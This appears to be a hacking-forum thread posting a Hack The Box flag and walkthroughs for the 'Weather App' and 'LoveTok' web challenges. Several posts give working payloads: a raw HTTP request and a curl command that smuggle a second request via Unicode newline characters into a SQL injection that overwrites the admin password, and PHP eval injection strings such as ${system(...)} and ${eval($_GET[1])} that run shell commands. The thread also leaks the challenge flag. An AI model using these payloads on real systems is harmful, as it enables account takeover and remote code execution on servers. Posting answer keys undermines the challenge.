TUTORIAL Weather App Web Challenge free flag and little walkthrough
by lucifer113 - February 22, 2021 at 12:42 PM
#1
Biggrin 
flag:

HTB{w3lc0m3_t0_th3_p1p3_dr34m}

walkthrough:

just send post:

POST /api/weather HTTP/1.1
Host: ip:port
User-Agent: cGFzcw==
Content-Type: application/x-www-form-urlencoded
Content-Length: 462
Connection: close

endpoint=127.0.0.1:80&city=ĠHTTP/1.1ĊHost:Ġ127.0.0.1:80ĊConnection:Ġkeep-aliveĊĊĊPOSTĠ/registerĠHTTP/1.1ĊHost:Ġ127.0.0.1:80ĊContent-Type:Ġapplication/x-www-form-urlencodedĊUser-Agent:ĠMozilla/5.0Ġ(X11;ĠLinuxĠx86_64;Ġrv:85.0)ĠGecko/20100101ĠFirefox/85.0ĊConnection:Ġkeep-aliveĊContent-Length:Ġ110ĊĊusername=adminĦpassword=admin%27)%20ON%20CONFLICT(username)%20DO%20UPDATE%20SET%20password=%27pass%27%20--+-ĊĊGETĠ/?&country=register


then go to http://ip:port/login and enter "admin:pass"

you will get the flag, enjoy!

null
#2
BTW, Dose anybody have LoveTok's writeup, i would really appreciate it, please help!
#3
(February 22, 2021 at 03:52 PM)lucifer113 Wrote: BTW, Dose anybody have LoveTok's writeup, i would really appreciate it, please help!

not exactly a walkthrough, but at least it's free so noone can complain i guess lol

lovetok is easy, it puts whatever you give it through an eval, so you can just pass it something in ${} which will execute whatever is in between the brackets as php code, so you can just do something like ${phpinfo()} to confirm you can execute code or ${system("ls -lah /")} to list all files in / and see what the flag file is called
#4
Thank you for sharing!!
#5
(February 22, 2021 at 05:27 PM)z3uz Wrote:
(February 22, 2021 at 03:52 PM)lucifer113 Wrote: BTW, Dose anybody have LoveTok's writeup, i would really appreciate it, please help!

not exactly a walkthrough, but at least it's free so noone can complain i guess lol

lovetok is easy, it puts whatever you give it through an eval, so you can just pass it something in ${} which will execute whatever is in between the brackets as php code, so you can just do something like ${phpinfo()} to confirm you can execute code or ${system("ls -lah /")} to list all files in / and see what the flag file is called
thanks bro, it works!

(February 22, 2021 at 04:41 PM)shadowhunter1337 Wrote: `
curl 'http://ip:port/api/weather'  -H 'Connection: keep-alive'  -H 'cGFzcw=='  -H 'Content-Type: application/json'  -H 'Accept: */*'  --data-binary '{"endpoint":"127.0.0.1:80","city":"ĠHTTP/1.1ĊHost:Ġ127.0.0.1:80ĊConnection:Ġkeep-aliveĊĊĊPOSTĠ/registerĠHTTP/1.1ĊHost:Ġ127.0.0.1:80ĊContent-Type:Ġapplication/x-www-form-urlencodedĊUser-Agent:ĠMozilla/5.0Ġ(X11;ĠLinuxĠx86_64;Ġrv:85.0)ĠGecko/20100101ĠFirefox/85.0ĊConnection:Ġkeep-aliveĊContent-Length:Ġ108ĊĊuse
rname=adminĦpassword=admin%27)%20ON%20CONFLICT(username)%20DO%20UPDATE%20SET%20password=%27pass%27%20--+-ĊĊGETĠ/?","coun
try":"register"}'  --compressed  --insecure
`
nice done,bro, awesome!
#6
weird.... ${phpinfo()} is working for me, even is working ${system(ls)}, but if I put a space char, it doesn't work. This is not working for me ${system("ls -lah /")} ¿?
#7
(March 02, 2021 at 08:57 AM)siracuso Wrote: weird.... ${phpinfo()} is working for me, even is working ${system(ls)}, but if I put a space char, it doesn't work. This is not working for me ${system("ls -lah /")} ¿?
just try this: ${eval($_GET[1])}&1=system("ls -la /");
#8
hmmm.... very smart. Nice idea. It works! thank you.
#9
(February 22, 2021 at 12:42 PM)lucifer113 Wrote: flag:

HTB{w3lc0m3_t0_th3_p1p3_dr34m}

walkthrough:

just send post:

POST /api/weather HTTP/1.1
Host: ip:port
User-Agent: cGFzcw==
Content-Type: application/x-www-form-urlencoded
Content-Length: 462
Connection: close

endpoint=127.0.0.1:80&city=ĠHTTP/1.1ĊHost:Ġ127.0.0.1:80ĊConnection:Ġkeep-aliveĊĊĊPOSTĠ/registerĠHTTP/1.1ĊHost:Ġ127.0.0.1:80ĊContent-Type:Ġapplication/x-www-form-urlencodedĊUser-Agent:ĠMozilla/5.0Ġ(X11;ĠLinuxĠx86_64;Ġrv:85.0)ĠGecko/20100101ĠFirefox/85.0ĊConnection:Ġkeep-aliveĊContent-Length:Ġ110ĊĊusername=adminĦpassword=admin%27)%20ON%20CONFLICT(username)%20DO%20UPDATE%20SET%20password=%27pass%27%20--+-ĊĊGETĠ/?&country=register


then go to http://ip:port/login and enter "admin:pass"

you will get the flag, enjoy!

null

Gives me error:

{"message":"Missing parameters"}
#10
Good writeup. First command
nc <ip> <port>
then POST /api/weather HTTP/1.1 ......etc
#11
(February 22, 2021 at 05:27 PM)z3uz Wrote:
(February 22, 2021 at 03:52 PM)lucifer113 Wrote: BTW, Dose anybody have LoveTok's writeup, i would really appreciate it, please help!

not exactly a walkthrough, but at least it's free so noone can complain i guess lol

lovetok is easy, it puts whatever you give it through an eval, so you can just pass it something in ${} which will execute whatever is in between the brackets as php code, so you can just do something like ${phpinfo()} to confirm you can execute code or ${system("ls -lah /")} to list all files in / and see what the flag file is called

Where I have to add '${phpinfo()}' to receive flag?
#12
(March 19, 2021 at 09:30 AM)Dark_Arwen Wrote:
(February 22, 2021 at 05:27 PM)z3uz Wrote:
(February 22, 2021 at 03:52 PM)lucifer113 Wrote: BTW, Dose anybody have LoveTok's writeup, i would really appreciate it, please help!

not exactly a walkthrough, but at least it's free so noone can complain i guess lol

lovetok is easy, it puts whatever you give it through an eval, so you can just pass it something in ${} which will execute whatever is in between the brackets as php code, so you can just do something like ${phpinfo()} to confirm you can execute code or ${system("ls -lah /")} to list all files in / and see what the flag file is called

Where I have to add '${phpinfo()}' to receive flag?

the easiest step is left as an exercise to the reader lol

Possibly Related Threads…
Thread Author Replies Views Last Post
SELLING HACKTHEBOX TOP SELLER - ACTIVE MACHINE, CHALLENGE, XEN, POO, HADES, JET,RASTALABS, OS Mrbom 213 39,279 4 hours ago
Last Post: Mrbom
TUTORIAL The needle htb hardware challenge free writeup NopSled 1 238 9 hours ago
Last Post: xander2000
SELLING HTB Crypto Challenge Broken Decryptor Script Consigliere 2 506 11 hours ago
Last Post: Consigliere

 Users browsing this thread: 2 Guest(s)